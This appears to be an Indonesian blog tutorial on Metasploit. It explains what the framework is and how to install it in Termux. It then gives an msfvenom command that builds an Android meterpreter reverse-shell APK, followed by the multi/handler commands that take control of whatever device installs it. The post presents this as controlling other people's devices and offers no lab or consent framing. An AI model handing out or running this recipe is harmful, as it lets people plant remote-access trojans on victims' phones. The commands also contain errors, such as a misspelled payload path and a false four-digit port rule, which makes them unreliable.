Metasploit
Linux memiliki banyak tools yang bisa digunakan secara gratis, beberapa di antara adalah :
- Metasploit
- Nmap
- Wireshark
- Armitage
- Dll
Namun disini kita tidak akan bahas semua itu, disini kita akan bahas Mestasploit, sebelum pada tatacara penggunaan, kita bahas terlebih dahulu apa itu metasploit dan apa kegunaan nya.
Metasploit
 |
| Tampilan metasploit |
Metasploit adalah aplikasi yang dipakai secara luas sebagai exploitation tools dalam bidang hacking dan IT Security, tools ini banyak digunakan baik oleh beginner ataupun professional.
Metasploit sendiri didefinisikan sebagai framework untuk melakukan cyber exploitation, sebagai suatu framework sangat memiliki dukungan untuk membuat suatu exploit vulnerability yang belum diketahui pada suatu jaringan.
Metasploit akan mendevelop suatu meterpreter ketika di load ke suatu target, membuat control akses dan control sasaran lebih mudah. Dengan demikian seorang hacker baik white hacker atau black hacker wajib memiliki dasar pengetahuan mengenai metasploit.
Kegunaan metasploit
metasploit framework bisa juga di katakan sebagai sebuah platform pengembangan untuk membuat tool security dan exploit.
Metasploit framework sering dibuat dengan menggunakan bahasa pemrograman Ruby.
Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju.
Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada padajarakjangkauan yang jauh tetapi dapat mengendalikan komputer korban.
Metasploit menyerang dengan cara mengirimkan exploit yang berisi payload yang sudah ditentukan oleh penyusup sistem pada komputer korban.
Exploit merupakan software yang berfungsi untuk memanfaatkan kelemahan pada software korban(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban.
Cara menggunakan metasploit
Seperti penjelasan di atas, metasploit berfungsi untuk exploitasi terhadap prangkat lain, artinya kita bisa mengendalikan prangkat lain dengan prangkat kita sendiri dengan menginstall kan softwere yang telah dibuat menggunakan metasploit.
Namun disini kita akan mempelajari cara menginstallan nya menggunakan aplikasi termux, bagi yang belum tahu apa itu termux saya telah membuatkan postingan mengenai apa itu termux.
Cara penginstallan metasploit
Jika kalian sudah memiliki aplikasi termux atau bisa juga menggunakan git pada laptop. Berikut langkah-langkah nya :
1.Pkg install curl
2.Pkg install mechanize
3.Pkg install pip
4.Pkg install ruby
5.Pkg install git
6.Pkg install python2
7.Pkg install request
8.Git clone https://github.com/rapid7/metasploit-framework (proses penginstalan metasploit)
9.cd metasploit-framework
10. ./msfconsole (proses menjalankan metasploit)
msfvenom -p andorid/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 -o /sdcard/namaAPK.apk
Untuk bagian LPORT kita bisa bebas menggunakan angka brapa saja namun harus 4 digit, dan untuk namaAPK bebas kita bisa menamakan nya, namun harus di akhiri dengan (.apk) itu menunjukan bahwa ini adalah jenis file aplikasi.
 |
| Pembuatan softwere |
Jika pembuatan softwere sudah di gunakan dan berhasil. Selanjutnya kalian buka kembali metasploit nya dengan mengetikan (.msfconsole). Selanjutnya ketikan printah sebagai berikut.
 |
| Menjalankan softwere |
1. ./msfconsole
2. use exploit/multi/handler
3. set payload android/meterpreter/reverse_tcp
4. set lhost 127.0.0.1 (atau host yang kalian pakai )
5. set lport 5555 (port bebas)
6. run
 |
| Berhasil connect exploit |
Posting Komentar